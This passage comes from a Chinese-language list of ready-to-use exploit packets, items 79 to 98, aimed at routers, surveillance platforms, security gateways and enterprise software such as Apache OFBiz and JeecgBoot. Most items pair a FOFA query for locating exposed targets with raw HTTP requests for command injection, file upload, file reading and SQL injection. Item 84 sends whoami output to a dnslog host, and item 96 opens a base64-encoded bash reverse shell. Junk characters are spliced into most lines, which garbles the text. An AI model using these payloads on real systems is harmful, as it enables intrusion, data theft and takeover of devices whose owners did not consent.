0 c9 q+ a0 M) T+ X( E, G& ^YsOxWxSvj1KyZow1PTsh98fdu6l
" f' ?' f& Y, \9 k! M7 _------YsOxWxSvj1KyZow1PTsh98fdu6l9 [1 @0 a# _& t* ^" _+ i, q8 Y
Content-Disposition: form-data; name="target"
( t$ ~' D2 O7 C ] k
! S5 b. i( y5 {* o, k6 ?/Applications/SkillDevelopAndEHS/7 b9 Y' I3 \ F# [3 a8 H0 O
------YsOxWxSvj1KyZow1PTsh98fdu6l--, j, _; s: t5 n& t, w ~
1 _3 @8 [' [: J8 g2 P* `* f8 D
' p8 e/ K4 C" f4 j" o0 \GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1% x2 K$ {; g: m& i
Host: x.x.x.x
1 Z) A9 ~2 b2 u' {$ A9 o" o5 {3 {: @; a3 d# E! `+ i b9 `. `8 M
; g/ M; h+ s7 w& `; n
79. BYTEVALUE 百为流控路由器远程命令执行& t6 r6 @. p5 E) ~, |2 f
FOFA:BYTEVALUE 智能流控路由器
* G; q' D5 s+ j" Z( \' T NGET /goform/webRead/open/?path=|id HTTP/1.17 U8 H* x) L$ ]3 T, T+ z
Host:IP
. w4 t5 f# Z/ d5 A+ g. L# pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
0 X9 h" ~0 N6 o/ S6 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 t4 V# I& u& h! t* e( \( a# i7 ?0 U! k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" v. s" F' F a7 n: B9 x* N8 t* H8 v: I: aAccept-Encoding: gzip, deflate* a' e, v9 h6 k" S, O! s5 h: C
Connection: close/ @5 B' a7 c/ _* h
Upgrade-Insecure-Requests: 1
4 }$ E! l& F; y9 X& B* c6 f& o# l; i1 L- y& M5 P2 R4 L
9 Q/ t* B, d' M' R6 w( h( m8 T
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传) X" U- T* Z9 `" S P; U
FOFA:app="速达软件-公司产品"
p; s( j# `8 t3 U4 y) iPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1" N+ |+ D ~; u! \1 a5 k2 e
Host: x.x.x.x
7 s; G0 o3 c9 `$ ^& XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# W! O: {+ X% a/ K+ m: ]Content-Length: 27
+ |, v% ?' s# V7 G4 r+ U8 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 H, H# l1 F6 m/ k. z/ E) B0 K
Accept-Encoding: gzip, deflate
5 |6 L. r) j0 ^* p: U( x9 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 P' p' K' P3 v5 }Connection: close2 R# L( P3 E# ], w
Content-Type: application/octet-stream" C' u, Z' d( p6 W% L
Upgrade-Insecure-Requests: 1
4 S/ N' o: I2 r+ b7 ^* F9 x" E! y, C/ R; ]2 r
<% out.print("oessqeonylzaf");%>
0 {# n& b! z8 S8 M: H+ S4 E; E& L; }
$ m/ N0 v" m h% ]; O
GET /xykqmfxpoas.jsp HTTP/1.11 l% `% k5 g! s) J0 G% Y# p* W
Host: x.x.x.x- S: @! v# C J% Z M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 u3 `& u% U1 L/ k$ ]
Connection: close
$ ~# U/ g5 \* s0 B# e; iAccept-Encoding: gzip
6 X. J N" p' @
5 V2 p' K5 o) n( }2 m/ H; Q' |5 j$ R$ ?" [" K" O
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
% h' w- u [' \$ rFOFA:app="uniview-视频监控"
# a) f# ]% c0 {8 z% XGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
& q+ T$ L2 Y: V+ a- `3 A! wHost: x.x.x.x
5 k2 ]$ b& c8 a/ a, {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 m+ A8 X$ F) D" L1 F N7 i8 t5 UConnection: close, R; w5 d. a7 \+ o2 }5 `) e
Accept-Encoding: gzip
5 [5 H) e0 U: \9 g, K3 F$ m5 m& \) E# i4 M& N
# A& a" f. N% d; K# `) V* X82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行& V3 K3 s" f+ i4 I8 T7 z
FOFA:app="思福迪-LOGBASE"6 J2 M' }" Z: n) C# S
POST /bhost/test_qrcode_b HTTP/1.1
. ~5 h, J8 L8 |5 k! s4 VHost: BaseURL
c' q" O2 e) ?0 f9 c! ?User-Agent: Go-http-client/1.16 g5 |4 i, E- o" X
Content-Length: 23( C7 V0 ?" M" R) `3 a- Q
Accept-Encoding: gzip
! @+ h* `) O, |Connection: close
- S5 [- v) D5 X: T2 |+ UContent-Type: application/x-www-form-urlencoded
( V0 |5 k% |+ [2 K& d5 fReferer: BaseURL
$ }# D& |! \* j) m9 V
6 }1 j$ F: `1 j3 Sz1=1&z2="|id;"&z3=bhost0 \& ?- u' U8 Y* h" X, ?" |
* J* m2 W8 a7 K4 L+ J8 C( i
% _; l. K# A& W83. JeecgBoot testConnection 远程命令执行, s- t4 H. A0 B1 |3 X4 a) w
FOFA:title=="JeecgBoot 企业级低代码平台"/ e* C! t, ]7 |
9 m( G o0 e5 Q- Z/ G9 |
# Z$ k: ]4 z, Y$ S- lPOST /jmreport/testConnection HTTP/1.1: ?; j) T+ G' o3 f$ d0 T3 Y3 S% W
Host: x.x.x.x( r3 L# T& b4 G1 E* F$ t6 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 n, }2 {; b1 H$ ]6 a* mConnection: close
- f# n: q- W% N6 lContent-Length: 8881& s4 W: d+ @$ N3 e1 B& q8 T
Accept-Encoding: gzip
) x) m7 i! Y V" }! s, p tCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO". }# t$ a& w( `
Content-Type: application/json
7 o7 \7 \( c9 D, O6 r# F/ `& @ w( s) @' ?
PAYLOAD" W" l- h8 o4 ?+ O
" ?! p: W) @) i/ b84. Jeecg-Boot JimuReport queryFieldBySql 模板注入- h# x% ]& n3 Q( `' a
FOFA:title=="JeecgBoot 企业级低代码平台"- X' W; D1 m. c8 U9 p
3 L% u: J1 i/ [; ^- ^# ?6 @. \. t/ q5 X+ E/ d; u3 _8 g t, _
/ U0 [3 q" O3 c% K
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.11 S: l" s. d( E* d H S+ t
Host: 192.168.40.130:80807 j9 r' v2 `' {1 B1 I! B
User-Agent: curl/7.88.1
2 {! ^2 Q3 c$ @: Z7 k! ]Content-Length: 156
0 x) P4 [! L4 n+ _Accept: */*' l) s6 M& ?" { |- g8 y3 B7 L
Connection: close7 X5 Y' A9 g; A2 ?5 W) k P" b: [' [
Content-Type: application/json
6 ^* S9 [; b, Y/ {Accept-Encoding: gzip
) }: y9 @0 V; ~. W6 n7 ^5 d
+ Y9 d0 [7 _1 g, J{
% l# N4 X3 o4 `# j' A% H% p8 B/ N "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",, u5 B0 n6 i/ ~7 O
"type": "0"3 G" Y1 j3 B; f3 A# ~4 `+ O* @
}
3 B% `- {! R) |9 `& d% }7 i; e6 A0 A) V
" p) [( e7 Z/ J x5 m8 w5 |85. SysAid On-premise< 23.3.36远程代码执行$ b" ]5 D6 U3 s5 d8 K
CVE-2023-47246
) f2 b$ o$ l$ p' IFOFA:body="sysaid-logo-dark-green.png" " ?3 o& ^7 E& |4 J# F; g
EXP数据包如下,注入哥斯拉马' L9 B$ {5 T6 T- V2 m
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
4 M2 D: J- \4 X$ b( J* FHost: x.x.x.x
7 o# ]5 N# V# g! I I, XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. a: t! Q' W5 |- K1 c+ qContent-Type: application/octet-stream9 f5 ~+ [8 q6 m. P& a- _+ D X$ s
Accept-Encoding: gzip8 Y8 Q# R7 s: { K# ~& y
5 F3 F1 l$ E6 a" R) c$ q, R) t3 gPAYLOAD4 ]6 a2 I3 f# X
0 y" w5 j" f3 E
回显URL:http://x.x.x.x/userfiles/index.jsp' K$ O& a3 @/ B( G4 B7 Y
* I* [- P6 ?1 Y! M3 K
86. 日本tosei自助洗衣机RCE
4 K4 }# c. K0 L8 @- EFOFA:body="tosei_login_check.php"
1 g* _' M8 C( q# k# R) x) i: iPOST /cgi-bin/network_test.php HTTP/1.1
$ i! b4 }& M& t1 J1 |Host: x.x.x.x: D8 l$ B; y- m2 h. |
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
# U' S0 i6 _+ A( mConnection: close
8 ^7 ~4 v# }7 k' W/ V3 c1 k \Content-Length: 44
! K: v3 Z# y& J. AAccept: */*" S) D: P0 t, f& u
Accept-Encoding: gzip! _6 M, \% D- f# f2 I( }
Accept-Language: en
" x$ Z' V( ]3 s# V' t; S+ hContent-Type: application/x-www-form-urlencoded+ ]1 {1 y7 M4 W- b. @! ?
* m4 c S1 B# d! I
host=%0acat${IFS}/etc/passwd%0a&command=ping$ D% |) G2 x" q8 s9 a& M) w
4 l5 }/ |$ Y( q. \1 S
* j1 e5 I' }# K' O" c: R' s87. 安恒明御安全网关aaa_local_web_preview文件上传
; a b1 z/ x8 K9 _7 I+ UFOFA:title="明御安全网关"
; I& G, C, v. l" a0 v; Z; X, XPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1& |6 r0 D6 d& _1 R0 l4 g3 F
Host: X.X.X.X
+ `" @8 Q* c0 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ ~) w$ r0 }2 Y. H7 n. yConnection: close# x7 g1 ^9 @6 s) l# f# J
Content-Length: 198
/ L7 T7 ?1 y! C9 K! ~# V9 h# XAccept-Encoding: gzip
% T5 c8 B* O( zContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd: n; K( ^! ]) U; Q. i
. e4 P& R1 U- Y [- ? _( a--qqobiandqgawlxodfiisporjwravxtvd' \+ W+ H' P' x7 k9 j( T; e
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"! ~; `% q2 E; o7 W
Content-Type: text/plain w S2 _) ~2 u# _8 r% ?, M
; L; [ V$ j5 Z; _/ ?& l7 i2ZqGNnsjzzU2GBBPyd8AIA7QlDq+ [ T+ \0 M+ G2 }7 k7 {
--qqobiandqgawlxodfiisporjwravxtvd--
1 m+ M! G3 X+ w- U0 {+ }
! v8 b$ M W b& P& I$ M: i/ H% X6 U) @. k+ l4 y d9 m |
/jfhatuwe.php @' n& ~9 {8 S- M
, F, z/ J- `) _
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
9 X4 M4 R/ _% ^- B" i" RFOFA:title="明御安全网关"
9 E2 g- {& _. VGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
% ^5 t1 i6 V o& E. n, ?Host: x.x.x.xx.x.x.x% R: O9 B! x3 x7 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 M" s# f% T \, d8 R6 g- f! dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) d) n9 y' x# r6 OAccept-Encoding: gzip, deflate
8 n5 E3 L9 a; Z. S, bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( e |2 |, F. x, x6 jConnection: close' C# ~+ H, W; I
, d( M( v5 v! p
/ G( D a" ^7 y, F/astdfkhl.php
$ U% D( P# x8 o$ H* h9 c ]/ [) t) B: V( `* e, @1 A
89. 致远互联FE协作办公平台editflow_manager存在sql注入
8 h# X4 o; R4 JFOFA:title="FE协作办公平台" || body="li_plugins_download"
9 D R# l5 C8 d; r7 {) b+ C# X& vPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
- r/ H/ k4 Z4 h8 d1 F4 gHost: x.x.x.x; o B8 g$ w; S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* r+ g* \& {0 U4 D% ]Connection: close
& H N" s6 F+ j8 MContent-Length: 413 K: Z6 {) o: ]
Content-Type: application/x-www-form-urlencoded; H: J1 @3 A7 L: B
Accept-Encoding: gzip
1 w$ g* z6 n" k8 k y- V- |0 E# c- l9 V
option=2&GUID=-1'+union+select+111*222--+0 H' O' f) F. T8 ?5 D* T$ Y
2 e1 O" a$ h* ^) a, b1 k! l2 E6 O9 e
3 ~% r' ?* \+ f$ U. I" ]
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
9 l' x! K" K) b5 L! sFOFA:icon_hash="-1830859634"
8 u0 q' x% I- v7 IPOST /php/ping.php HTTP/1.1' E T( S. O5 i- K1 {1 D3 S* o
Host: x.x.x.x
1 w" l7 s$ o3 ]5 b- z2 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
1 `6 Q9 [8 H& p7 z( QContent-Length: 51
" V) m4 [1 `! B+ S5 b0 Z. gAccept: application/json, text/javascript, */*; q=0.01
. T4 l: {: Z' _' Y rAccept-Encoding: gzip, deflate
7 V7 L0 s! y4 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ S: L8 z. _* w
Connection: close
" T9 x4 m& q2 l+ n) d) K; f1 c1 ?Content-Type: application/x-www-form-urlencoded; }9 n3 f1 s+ W& w
X-Requested-With: XMLHttpRequest
& ]/ \% r. _2 N* X# k1 ?
9 r8 w' E4 l: h, H, V" R1 G# rjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig; X* g8 j7 B* ~ U2 u1 i4 P1 R: F
1 w' _5 V* A& v6 ?) }1 E1 n1 P8 Z9 [4 P! }- x$ ^+ g( j
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取$ ~: T' W z0 L/ m' V
FOFA:title="综合安防管理平台"
+ c6 {5 X% u- P1 J: b& uGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1* n0 C/ `2 R. A( W( o9 x) A" j: r
Host: your-ip( m2 s. @8 V1 B& Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, q+ d& Z) @* c) ]
Accept-Encoding: gzip, deflate- u" X( m w5 G
Accept: */*' Z n6 s: y$ v! L; X% L
Connection: keep-alive$ k" m, @8 j% b: p6 F4 U
" N% t' C- {# i o0 W% Z8 a* R
' P5 U5 p# i7 D) Y, L1 _" _: a9 C' b3 b$ i& w
92. 海康威视运行管理中心session命令执行
3 h. b7 I* M- ^# H# D' D( z' H jFastjson命令执行
$ _7 k! c( z" e7 J6 G$ X6 Y% @" Nhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"9 C& ?& N, ]2 I% m
POST /center/api/session HTTP/1.1% d3 H, e0 W, q2 F
Host:
* B2 U5 F3 W7 y r. i. U2 uAccept: application/json, text/plain, */*5 z: l0 m- b* L2 C# q
Accept-Encoding: gzip, deflate1 E) p& @& c W: Q) ^
X-Requested-With: XMLHttpRequest
, j; K( I$ _5 }' P N# ~' DContent-Type: application/json;charset=UTF-8
- t) t" [% ]" l. [X-Language-Type: zh_CN) F9 j% v% w. @7 @5 d9 W
Testcmd: echo test* X: R8 W! g( _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
( G- v2 ]4 f/ fAccept-Language: zh-CN,zh;q=0.9* z& j2 ~ _& s+ ?4 V
Content-Length: 57789 W! d* Z, X2 Q8 s* P0 R
F( j% q$ Y) h. j$ ZPAYLOAD
5 A* R" M0 R) l. d7 _! Z' D$ i% l9 Y; q5 V9 I0 `. D/ D4 I' B1 E
4 a/ [" h( i* k93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传: t R4 [) Q) Q# H& d
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
% C* }) B3 | v6 Y2 ^6 UPOST /?g=app_av_import_save HTTP/1.1
6 I) a4 k2 a! R+ z7 r- V; |Host: x.x.x.x1 @. x4 Y9 K4 P
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
: w& ^$ d- \% f, WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 v0 e) q( I4 I7 V" P. o* E3 @5 F) n& Y1 t2 a& D( C" l
------WebKitFormBoundarykcbkgdfx
9 w$ T- q7 [) r$ [+ Q5 vContent-Disposition: form-data; name="MAX_FILE_SIZE" ^7 r4 b/ H/ [4 U b r' k- c3 R- g
& T; D$ |6 H3 h. S
10000000
) V1 X9 a0 G* Q) S1 G9 H6 l( i. H------WebKitFormBoundarykcbkgdfx1 P, j- p5 \' _9 l. A
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"3 {+ f. Z% l/ _, P" F; ^+ [, m
Content-Type: text/plain
( Y/ l: J! ]% g. b
5 A' d& @# X" B& V8 T4 c# d: u1 c- uwagletqrkwrddkthtulxsqrphulnknxa
# ?. a1 u k2 f( m. Y------WebKitFormBoundarykcbkgdfx( [4 D! Q( v: ~* ]8 }# z
Content-Disposition: form-data; name="submit_post"* \6 H9 W+ n& ]9 x; T
1 I: d/ V: h( p3 S0 \' N
obj_app_upfile' c* b# a: c. @, b9 `5 i
------WebKitFormBoundarykcbkgdfx/ C! Q" r/ }0 d$ L1 `
Content-Disposition: form-data; name="__hash__"
4 p- v8 d E* D% U) U8 C X, {# v$ n7 q7 r8 K, W
0b9d6b1ab7479ab69d9f71b05e0e94458 q6 R9 o( ]2 S! n( T
------WebKitFormBoundarykcbkgdfx--
' N2 m% b4 {9 J, |5 R c3 r! ?. C. c3 o9 H) J% e
# [- j" h/ |# y9 F0 k3 G
GET /attachements/xlskxknxa.txt HTTP/1.12 X8 ]. N* J) Y$ n7 m% H3 u
Host: xx.xx.xx.xx
* L/ ^+ r3 G6 a7 i0 _7 fUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; c" }2 v" i0 d& C4 k9 M; m
4 p& M& z: i: N; |" Q1 ]8 c8 u
: K6 R$ L! L2 _7 y7 }3 ~94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传1 t, j, q ^* Z1 r
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
3 t) z# j' W2 |: ^7 R: W- W/ nPOST /?g=obj_area_import_save HTTP/1.1
7 z. e V" ?2 t0 t/ q8 k* G4 BHost: x.x.x.x3 V* o/ i1 |5 G" \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt6 f1 h% x+ H3 v3 @5 \+ Y& e. ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* X1 J6 \+ _, [% T3 Z/ J
: r/ f) f6 t! p% D* e( a" w------WebKitFormBoundarybqvzqvmt
, ?6 r* e( ^! p' eContent-Disposition: form-data; name="MAX_FILE_SIZE"
# ~; L. }1 ?2 @ d4 k* m! ~4 X" L- N4 Q8 n8 e/ L) b$ ^* f# c
10000000: `3 U) F) P& v0 l; j- f
------WebKitFormBoundarybqvzqvmt- B& [! |- s, R, X# M L
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
+ H* k! |& w' d4 ~$ h& WContent-Type: text/plain/ Y/ S# x2 R7 Y, b6 `& l
, D; |2 w3 Y- b/ u, g# K; t+ ?pxplitttsrjnyoafavcajwkvhxindhmu
8 ?. j* [* U: ]" I% m------WebKitFormBoundarybqvzqvmt
! k" ^3 M; o6 SContent-Disposition: form-data; name="submit_post": l) w) C* ]4 k1 m
- l5 m- H( k6 S& Z( ^
obj_app_upfile
8 }) P3 D7 }' {( l; x------WebKitFormBoundarybqvzqvmt# M" r0 T4 B1 J& q$ X
Content-Disposition: form-data; name="__hash__"
" Y$ k, f( t4 j- p4 H- _0 r- _# s- N0 v) y
0b9d6b1ab7479ab69d9f71b05e0e94456 T! ]9 N# [7 A/ B# n9 `
------WebKitFormBoundarybqvzqvmt--& Y/ h( o8 V) f9 w) x
' s. s! Z- h4 @, |1 Y3 ?$ l* f, R! w
: P; [# h& L4 yGET /attachements/xlskxknxa.txt HTTP/1.1* a" v. X' n! R$ w$ I0 m. E
Host: xx.xx.xx.xx. K0 ]' P" Q2 d* a# Q# K: y2 q2 y6 z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.367 N$ N" V8 W) K0 u" K
1 u" E/ C6 C% X j0 a/ f5 n h# P' S, ?! [4 [3 s
9 d* @. d3 A; E& G; {7 P
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行8 n5 E# U0 f A1 S6 \
CVE-2023-49070& D) q {9 `( c! I8 E% G8 n* _5 b7 p
FOFA:app="Apache_OFBiz", @4 q* f9 k: G
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 n3 [0 @; F5 @' h. }Host: x.x.x.x& } t8 z* u. i/ ]+ ^' u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36& I% G: G9 z1 n. B3 E
Connection: close2 O% J$ y7 v( F! u$ m
Content-Length: 889
, Y! }3 n& P6 C4 g8 S9 {Content-Type: application/xml
+ M0 H* u9 g- ]* \1 hAccept-Encoding: gzip
7 l5 R9 w5 m9 w4 z$ B! x
4 y% k2 o# J! n( d<?xml version="1.0"?>6 m# _1 X5 W8 K: Z; h0 k+ r
<methodCall>6 \/ y1 L3 @, l; B7 I
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>% M% W: J4 l+ I7 H: J& ]# [
<params>
6 H0 k" s0 X/ E( ^ <param>
$ ~, ?4 `! y/ [$ G <value>
2 u$ L7 n7 c6 L O7 A2 C, g <struct>
2 w* x( }6 h. z: \8 \. s <member>
) `( x" X6 g. t4 i H' O <name>test</name>
) F* s+ Q, ^+ ? <value>
! g# @( f1 _* x$ B+ D! x8 g6 M <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
! E5 `" u: \+ s# c3 s! ]- b6 h </value>/ Q5 L4 Q6 s( U, _# a: A* D1 G5 w
</member>4 ]! L; y- {2 K
</struct>! X2 s" i1 R6 m. c! n' B7 U
</value>4 W2 y# D5 L! n. K
</param>
$ ]7 L" \1 x2 @, S! b+ B/ }; | </params> I8 u: X& G/ d# I+ D2 E' {. I
</methodCall>
! t" B2 C) [! J" f' Y
4 U- h; E+ c; Z& Y3 j" f# [' {( @: h4 E5 k2 ^% R# \. s% R
用ysoserial生成payload
: R! `* l0 S8 H* x) h' D- vjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
$ @, \! R# g1 e8 E" v( ~
. B( @6 ?: K! ]/ H2 y R; {
V/ e# N, p w6 L将生成的payload替换到上面的POC
9 S% v6 K+ `9 L0 RPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
& h+ r3 Y8 L: r* L: B3 {7 b# Y8 ?Host: 192.168.40.130:8443
& C* X; @, s" ?- j4 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.366 f |& i# M8 }9 i
Connection: close
2 ^( A( q/ V; n+ W; p" A7 O- d" TContent-Length: 889. n( U h8 u8 d0 i& k- K% w- @2 Q
Content-Type: application/xml
: K T5 {( k- [( {) p7 XAccept-Encoding: gzip3 Q- T; [& K, z6 S' W
% P& u9 l P3 v6 v& ZPAYLOAD
$ ]/ V; u. I: a7 K( F) ]1 u3 d( I( q/ R2 P+ O5 M2 c( ?
96. Apache OFBiz 18.12.11 groovy 远程代码执行8 r2 ~) j/ z. I
FOFA:app="Apache_OFBiz"9 h+ {5 R' }' d d/ F! D. w
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; f' G R" `7 s1 u
Host: localhost:8443* Y# o% u! U: a& x# H+ |9 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ \1 K9 x1 D- l( X' D |. }% lAccept: */*
! P. e! Y7 F8 x7 g3 w0 S VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 r, x0 v) ~8 W9 {" gContent-Type: application/x-www-form-urlencoded% `1 v% ^) b: K+ K1 U
Content-Length: 55
3 ^' V2 E7 z' b4 c) I
5 r( h; e M3 [$ U9 ~5 F3 GgroovyProgram=throw+new+Exception('id'.execute().text);
1 m1 t* F! Q H/ E5 A; V. \2 }1 S/ i6 {. c
1 i, p6 S5 s& i0 v7 O反弹shell
6 |- _$ l& B' v& y在kali上启动一个监听/ D6 M" _! L2 L2 O4 U
nc -lvp 77774 y3 V' H0 Z; _, \! \5 @1 o
3 P& R5 }3 j8 M% W- zPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1$ h' p4 s& t k* Y
Host: 192.168.40.130:8443, o$ l: W) r% j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# m. V( G! M- e9 xAccept: */*! e$ Y+ ?8 V& d* x+ k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 ?' t- o G2 C" m% lContent-Type: application/x-www-form-urlencoded
) |/ y$ U- C, E0 y- o' V% WContent-Length: 71" d( Q% w* m/ [4 Q, ?
/ F) n$ o9 m9 t; `1 B) agroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
) g0 X4 E% ~% z& t7 u9 M9 J" i1 c4 j, J* _! `) j9 G4 N
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 N. N/ U7 P- O+ W' |1 l2 a- \) J$ ]FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
9 s8 O& O( c3 }8 v- k4 l2 r) qGET /passport/login/ HTTP/1.14 q% O6 G- `& {
Host: 192.168.40.130:8085
) ^5 n& ]& Y' L& ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 w3 @- D$ K: J! r5 c, \9 T( P0 GAccept-Encoding: gzip6 z1 W' }4 p$ H( z( w; k
Connection: close! E3 O. X. p* f) E$ r
Cookie: rememberMe=PAYLOAD
6 L" T2 g! j0 o7 OX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
: E# x& [/ e/ ]& `% w. A' [: T! H% Q( P4 m8 U% L1 Y' \6 F
2 q. b, M9 ~% m$ Y: j. d
98. SpiderFlow爬虫平台远程命令执行
4 o' ~. S8 e& s3 Q4 p7 |# nCVE-2024-0195
: `. w3 O: g# b9 R! B. j6 q* P* [FOFA:app="SpiderFlow"
* w j5 E# j0 lPOST /function/save HTTP/1.15 a; b% g- c( q4 f
Host: 192.168.40.130:8088* F' J/ U0 t f3 Z7 W# D* i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) [5 u, {, Q8 B# q3 k3 RConnection: close
